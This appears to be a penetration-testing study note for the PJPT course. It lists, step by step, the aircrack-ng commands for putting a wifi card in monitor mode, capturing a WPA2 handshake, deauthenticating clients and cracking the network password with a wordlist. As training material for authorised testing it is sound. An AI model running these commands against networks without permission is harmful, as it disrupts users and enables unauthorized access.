PJPT – Wifi Attacks

Disclaimer: The following instructions are for educational purposes only and should not be used to attack real targets!

Attacking WPA2-protected Wifi networks

1. Connect the physical wifi antenna to your Kali machine. If wlan0 does not show up under “iwconfig”, then try the following solution: https://os73.com/en/how-to-install-alfa-awus036acs-driver-in-kali-linux/

2. Kill existing processes that could interfere with monitor mode:

sudo airmon-ng check kill

3. Start interface wlan0 in monitor mode:

sudo airmon-ng start wlan0

4. Look for available wifi networks and note the channel id and the MAC address of the target access point / wifi network:

sudo airodump-ng wlan0mon

5. Capture the handshake while monitoring the target wifi network (use the monitor-mode interface from step 3):

sudo airodump-ng -c <channel-id> --bssid <mac-access-point> -w capture wlan0mon

6. Deauthenticate clients on the target wifi network to increase the attack performance. Alternatively, you can wait until a wifi client reconnects to the wifi network:

sudo aireplay-ng -0 1 -a <mac-ap> -c <mac-station> wlan0mon

7. If the handshake is found (a message shows up in the console), look for the capture file. airodump-ng appends a sequence number to the prefix given with -w, so the first capture is written as “capture-01.cap”.

8. Try to crack the wifi pre-shared key / password with aircrack-ng:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <mac-access-point> capture-01.cap
